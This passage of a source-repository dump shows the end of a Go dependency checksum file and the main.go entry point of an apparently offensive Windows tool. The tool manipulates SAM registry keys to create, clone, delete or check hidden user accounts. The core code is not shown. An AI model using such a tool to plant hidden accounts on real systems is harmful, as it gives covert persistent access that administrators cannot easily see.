golang.org/x/sys v0.0.0-20211107104306-e0b2ad06fe42/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 73 | golang.org/x/sys v0.0.0-20220114195835-da31bd327af9 h1:XfKQ4OlFl8okEOr5UvAqFRVj8pY/4yfcXrddB8qAbU0= 74 | golang.org/x/sys v0.0.0-20220114195835-da31bd327af9/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 75 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= 76 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 77 | golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 78 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 79 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 80 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 81 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 82 | google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= 83 | google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= 84 | google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= 85 | google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= 86 | google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= 87 | google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= 88 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 89 | gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys= 90 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7/go.mod h1:dt/ZhP58zS4L8KSrWDmTeBkI65Dw0HsyUHuEVlX15mw= 91 | gopkg.in/yaml.v2 v2.2.4/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 92 | gopkg.in/yaml.v2 v2.3.0/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 93 | -------------------------------------------------------------------------------- /images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wgpsec/CreateHiddenAccount/6a9cd097c7ad33061d24a471a7847ceca9ece442/images/1.png -------------------------------------------------------------------------------- /images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wgpsec/CreateHiddenAccount/6a9cd097c7ad33061d24a471a7847ceca9ece442/images/2.png -------------------------------------------------------------------------------- /images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wgpsec/CreateHiddenAccount/6a9cd097c7ad33061d24a471a7847ceca9ece442/images/3.png -------------------------------------------------------------------------------- /images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wgpsec/CreateHiddenAccount/6a9cd097c7ad33061d24a471a7847ceca9ece442/images/4.png -------------------------------------------------------------------------------- /images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wgpsec/CreateHiddenAccount/6a9cd097c7ad33061d24a471a7847ceca9ece442/images/5.png -------------------------------------------------------------------------------- /images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wgpsec/CreateHiddenAccount/6a9cd097c7ad33061d24a471a7847ceca9ece442/images/6.png -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package main 6 | 7 | import ( 8 | "wgpsec.org/createHiddenAccount/common" 9 | "wgpsec.org/createHiddenAccount/core" 10 | ) 11 | 12 | func main() { 13 | username, password, deleteusername, cloneuser, onlycreate, check := common.Flag() 14 | common.DetermineRegistryPermissions("SAM\\SAM") 15 | common.DetermineRegistryPermissions("SAM\\SAM\\Domains") 16 | common.DetermineRegistryPermissions("SAM\\SAM\\Domains\\Account") 17 | common.DetermineRegistryPermissions("SAM\\SAM\\Domains\\Account\\Users") 18 | common.DetermineRegistryPermissions("SAM\\SAM\\Domains\\Account\\Users\\Names") 19 | if check { 20 | core.CheckHiddenAccounts() 21 | } else if deleteusername != "" { 22 | core.DeleteHiddenAccount(deleteusername) 23 | } else { 24 | core.CreateHiddenAccount(username, password, cloneuser, onlycreate) 25 | } 26 | } 27 | --------------------------------------------------------------------------------